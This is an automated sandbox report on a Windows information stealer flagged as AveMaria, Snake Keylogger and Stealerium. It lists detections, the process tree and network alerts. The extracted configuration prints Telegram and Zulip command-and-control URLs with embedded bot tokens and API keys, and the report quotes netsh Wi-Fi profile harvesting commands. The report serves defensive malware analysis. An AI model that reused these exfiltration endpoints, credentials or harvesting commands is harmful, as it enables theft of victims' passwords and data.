Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LKxcbzlwkz.exe

Overview

General Information

Sample name:LKxcbzlwkz.exe
renamed because original name is a hash value
Original sample name:02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801.exe
Analysis ID:1565141
MD5:8959a4884f81ac4db0967b534dae9617
SHA1:e4cc4e745820910b4f427b6c2385a43c87b7ce3b
SHA256:02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801
Tags:exevirustotal-vm-blacklistuser-JAMESWT_MHT
Infos:

Detection

AveMaria, KeyLogger, Stealerium
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AveMaria stealer
Yara detected Keylogger Generic
Yara detected Stealerium
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops password protected ZIP file
Found many strings related to Crypto-Wallets (likely being stolen)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LKxcbzlwkz.exe (PID: 4924 cmdline: "C:\Users\user\Desktop\LKxcbzlwkz.exe" MD5: 8959A4884F81AC4DB0967B534DAE9617)
    • JOUNLV.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" MD5: 8F39B25AF1B9048E0C7B06256C602B4F)
      • cmd.exe (PID: 7280 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7372 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7432 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • findstr.exe (PID: 7440 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 7520 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7600 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7984 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • taskkill.exe (PID: 8000 cmdline: taskkill /F /PID 4828 MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • timeout.exe (PID: 8028 cmdline: timeout /T 2 /NOBREAK MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • openfiles.exe (PID: 3492 cmdline: OPENFILES MD5: 50BD10A4C573E609A401114488299D3D)
  • msiexec.exe (PID: 7380 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
StealeriumAccording to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7944498476, "is_bot": true, "first_name": "Patriotrosh", "username": "Patriotp210Rohs_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}

Threatname: Stealerium

{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zipJoeSecurity_StealeriumYara detected StealeriumJoe Security
    C:\Users\user\AppData\Local\Temp\aut66E4.tmpJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\AppData\Local\Temp\aut66E4.tmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
        C:\Users\user\AppData\Local\Temp\aut66E4.tmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          C:\Users\user\AppData\Local\Temp\aut66E4.tmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
              00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
                00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
                    • 0x6336:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
                    Click to see the 22 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    1.0.JOUNLV.exe.1bb35cc0000.0.unpackJoeSecurity_StealeriumYara detected StealeriumJoe Security
                      1.0.JOUNLV.exe.1bb35cc0000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        1.0.JOUNLV.exe.1bb35cc0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          1.0.JOUNLV.exe.1bb35cc0000.0.unpackINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
                          • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

                          Sigma Signatures

                          Stealing of Sensitive Information

                          barindex
                          Sigma detected: Capture Wi-Fi password
                          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, ParentProcessId: 4828, ParentProcessName: JOUNLV.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7280, ProcessName: cmd.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-29T10:57:29.778769+010020293231Malware Command and Control Activity Detected192.168.2.449748149.154.167.220443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-29T10:57:20.485145+010028033053Unknown Traffic192.168.2.449741104.16.184.24180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-29T10:57:11.769478+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:14.183543+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:31.307649+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:31.713755+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:53.448959+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:53.857531+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:15.592309+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:15.999747+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:37.702732+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:38.114926+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:59.824195+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:59:00.231281+010028032742Potentially Bad Traffic192.168.2.449731188.138.68.21280TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-29T10:57:11.769478+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:14.183543+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:31.307649+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:31.713755+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:53.448959+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:57:53.857531+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:15.592309+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:15.999747+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:37.702732+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:38.114926+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:58:59.824195+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP
                          2024-11-29T10:59:00.231281+010028343921A Network Trojan was detected192.168.2.449731188.138.68.21280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: LKxcbzlwkz.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmpAvira: detection malicious, Label: TR/AVI.Stealerium.sbcde
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeAvira: detection malicious, Label: TR/AVI.Stealerium.sbcde
                          Found malware configuration
                          Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
                          Source: JOUNLV.exe.4828.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7944498476, "is_bot": true, "first_name": "Patriotrosh", "username": "Patriotp210Rohs_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmpReversingLabs: Detection: 65%
                          Multi AV Scanner detection for submitted file
                          Source: LKxcbzlwkz.exeReversingLabs: Detection: 78%
                          Yara detected AveMaria stealer
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmpJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: LKxcbzlwkz.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: 7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: -4556397073
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: https://api.telegram.org/bot
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: https://szurubooru.zulipchat.com/api/v1/messages
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: szurubooru@gmail.com
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpackString decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
                          Source: LKxcbzlwkz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.138.68.212:443 -> 192.168.2.4:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 31.14.70.249:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 50.17.0.11:443 -> 192.168.2.4:49751 version: TLS 1.2
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.costura.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: !costura.polly.core.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
